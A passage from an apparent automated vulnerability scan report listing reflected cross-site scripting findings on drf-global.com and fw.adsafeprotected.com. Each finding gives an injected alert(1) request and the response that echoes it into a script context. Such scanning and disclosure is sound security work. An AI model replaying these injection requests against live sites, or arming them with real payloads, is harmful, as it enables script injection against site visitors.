Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=0ffe58%3balert(1)//d4209f9fb72&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=DC3EB887B493EAE1352D240AB8EE0CBC.p0521; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.55
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5159

function Miwe0ffe58;alert(1)//d4209f9fb72() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGVyIj4NCgkJPHA+RmluZCBDaGVhcDwvcD4NCgkJPHA+SG
...[SNIP]...

4.54. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98c61"%3balert(1)//bb08c81a782 was submitted in the mid parameter. This input was echoed as 98c61";alert(1)//bb08c81a782 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=098c61"%3balert(1)//bb08c81a782&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=8F129309865236AA29C043EFCB3D41D2.p0524; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.58
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5164

function Miwe098c61";alert(1)//bb08c81a782() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGV
...[SNIP]...
opping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js"
       }
   }
}
Miwe098c61";alert(1)//bb08c81a782.prototype.getParts = function() {
return this.parts;
}
Miwe098c61";alert(1)//bb08c81a782.prototype.getPart = function(id) {
return this.parts[id];
}
window["miwe098c61";alert(1)//bb08c81a782"] = new Miwe098c61";alert(1)//bb08c81a782();
4.55. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5158"-alert(1)-"293bd78879f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dcb5158"-alert(1)-"293bd78879f/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DA8C3EB6580BDA74A6A3C507C2885868; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
yNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dcb5158"-alert(1)-"293bd78879f/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47
...[SNIP]...

4.56. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d5a4"-alert(1)-"8cca82e364c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/106258d5a4"-alert(1)-"8cca82e364c/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9E55FC0BFE83E04647B4209467C8C4A9; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
CRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/106258d5a4"-alert(1)-"8cca82e364c/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAd
...[SNIP]...

4.57. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a71"-alert(1)-"18fbcbf40bd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711c2a71"-alert(1)-"18fbcbf40bd/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BD959B6AEF33638B8DF2F06BF8277F0E; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
Y2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711c2a71"-alert(1)-"18fbcbf40bd/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSg
...[SNIP]...

4.58. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f192d"-alert(1)-"d55e5a7138a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adif192d"-alert(1)-"d55e5a7138a/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D0E6B1852B91D5D61A99A14AD17B596F; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711/adif192d"-alert(1)-"d55e5a7138a/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMD
...[SNIP]...

4.59. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cacc9"-alert(1)-"5c371b0f231 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COMcacc9"-alert(1)-"5c371b0f231/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5A488FCBEAF7E64AD334958F04D83C6F; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:23 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
